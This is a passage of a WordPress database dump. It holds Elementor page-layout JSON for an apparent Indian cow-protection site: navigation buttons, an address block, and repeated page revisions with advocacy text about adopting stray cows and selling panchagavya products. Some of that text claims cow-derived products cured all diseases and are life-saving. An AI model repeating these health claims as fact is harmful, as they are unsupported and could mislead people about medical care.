\\/]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"117d94d\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"8a58209\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0459073\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f01ff4f\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(11251,1874,'_elementor_page_assets','a:0:{}'),(11253,1875,'_elementor_edit_mode','builder'),(11254,1875,'_elementor_template_type','wp-page'),(11255,1875,'_elementor_version','3.7.8'),(11256,1875,'_wp_page_template','elementor_canvas'),(11257,1875,'_elementor_data','[{\"id\":\"1b3f952\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"0135c90\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"22f7707\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"75\",\"height\":\"75\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"7ccac8b\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"4a5c3c2\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"14ed504\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"c17fb13\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"8bbe50b\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"80d9579\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"61d00ed\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"c8dec05\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"32d56b3\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"921678d\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"75327ba\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e86e541\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"1605bf1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"10265e7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Contribute-123.png\",\"id\":1725,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4aab555\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>In India, cows wander on streets and there are hardly any people caring about them. They are left just as stray dogs where they roam on the roads, with some even bullied by the passers-by. Such cows are always hit by the people who seem it as fun to do so. Such cows need to be adopted or tamed by the locals in order to prevent them from the bullies or tortures they face. stress on these cows and requests people to join hands so that together we all can save our Gau Mata. It\\u2019s unfortunate to see that in India, where cows are worshipped as a Goddess, many people choose to ignore the conditions in which they are left to litter around and roam like just any other stray animal. Cows are valuable and it\\u2019s our duty to save this breed for it is only for our own benefit. We get milk by the cow which is, as we all know, necessary for our health. We need to preserve this rare species and for that it is necessary that people come forward to adopt them.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c479969\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"ad82ec2\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"61e999c\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[table id=1 \\/]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"117d94d\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"8a58209\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0459073\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f01ff4f\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(11258,1875,'_elementor_page_assets','a:0:{}'),(11260,1876,'_elementor_edit_mode','builder'),(11261,1876,'_elementor_template_type','wp-page'),(11262,1876,'_elementor_version','3.7.8'),(11263,1876,'_wp_page_template','elementor_canvas'),(11264,1876,'_elementor_data','[{\"id\":\"1b3f952\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"0135c90\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"22f7707\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"75\",\"height\":\"75\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"7ccac8b\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"4a5c3c2\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"14ed504\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"c17fb13\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"8bbe50b\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"80d9579\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"61d00ed\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"c8dec05\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"32d56b3\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"921678d\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"75327ba\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e86e541\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"1605bf1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"10265e7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Contribute-123.png\",\"id\":1725,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4aab555\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>In India, cows wander on streets and there are hardly any people caring about them. They are left just as stray dogs where they roam on the roads, with some even bullied by the passers-by. Such cows are always hit by the people who seem it as fun to do so. Such cows need to be adopted or tamed by the locals in order to prevent them from the bullies or tortures they face. stress on these cows and requests people to join hands so that together we all can save our Gau Mata. It\\u2019s unfortunate to see that in India, where cows are worshipped as a Goddess, many people choose to ignore the conditions in which they are left to litter around and roam like just any other stray animal. Cows are valuable and it\\u2019s our duty to save this breed for it is only for our own benefit. We get milk by the cow which is, as we all know, necessary for our health. We need to preserve this rare species and for that it is necessary that people come forward to adopt them.<\\/p>\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c479969\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"ad82ec2\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"61e999c\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[table id=1 \\/]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"117d94d\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"8a58209\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0459073\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f01ff4f\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(11265,1876,'_elementor_page_assets','a:0:{}'),(11268,1877,'_elementor_edit_mode','builder'),(11269,1877,'_elementor_template_type','wp-page'),(11270,1877,'_elementor_version','3.7.8'),(11271,1877,'_wp_page_template','elementor_canvas'),(11272,1877,'_elementor_data','[{\"id\":\"bd48cf8\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"a54ffbe\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"13df1e1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"75\",\"height\":\"75\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"e9cb50b\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"3e6d778\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"8b2632b\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b2360e0\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"497dcae\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"682b6d2\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"e793398\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"26193d5\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"21b2e7c\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"ed693bd\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"9ad2eca\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9c89a5d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"a0807d4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"b828571\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK55.png\",\"id\":1577,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0caef34\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being.<\\/p><p>All things needed were produced in every village and this was possible only because of the GAUMAATA. Not only cow dung \\/ cow urine based farming was done even all the diseases were cured by Panchgavyas received by Cows. Our GAUMAATA was the basis of a healthy, prosperous, happy and wealthy BHARAT. Gradually we were attacked by foreigners, our culture became distorted, large companies controlled the economy and the economy became centralized. Entrapped in the propaganda propagated by the big companies, we started chemical based agriculture &amp; left natural agriculture and also we forgot the remaining utility of the holy cow, whereas there is no such thing of our basic requirement which can not be fulfilled by the holy cow. In today\\u2019s scenario, there are many researches have been done on the cow Gavyas and from these researches it has been proven that cow is a special gift of God to humanity. Even today, there are many people who cultivate not only cow based agriculture but also they produce panchagavya based special products to share importance of holy cow in society. These products are not only over-effective but also these have the life saving property. The only problem is that people who are doing such excellent work for society do not have a market and because of their inability to advertise\\/marketing, they are not able to reach people even people want these best products<\\/p><p>We also want to establish a market for such people who are continuously doing work hard to save GAUMAATA, they produce Panchgavya products and do poison free farming. We are committed to create a platform for such people who are producing best quality products to make poison free society and also doing commendable work to save the nation\\u2019s culture and civilization. Our only aim is to re-organize the cow based economy which will be governed by the villages &amp; villagers, because as long as this system was in the country, the country was called gold\\u2019s sparrow and today, where we have reached in the lack of this system, it is not hidden from anyone. In short, We want to make a poison free, healthy, happy, prosperous, wealthy and powerful nation.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25721f3\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b7dd35b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c9a8b6b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a3c36fb\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(11273,1877,'_elementor_page_assets','a:0:{}'),(11274,1878,'_elementor_edit_mode','builder'),(11275,1878,'_elementor_template_type','wp-page'),(11276,1878,'_elementor_version','3.7.8'),(11277,1878,'_wp_page_template','elementor_canvas'),(11278,1878,'_elementor_data','[{\"id\":\"bd48cf8\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"a54ffbe\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"13df1e1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"75\",\"height\":\"75\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"e9cb50b\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"3e6d778\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"8b2632b\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b2360e0\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"497dcae\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"682b6d2\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"e793398\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"26193d5\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"21b2e7c\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"ed693bd\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"9ad2eca\",\"elType\":\"widget\",\"settings\":{\"text\":\"My 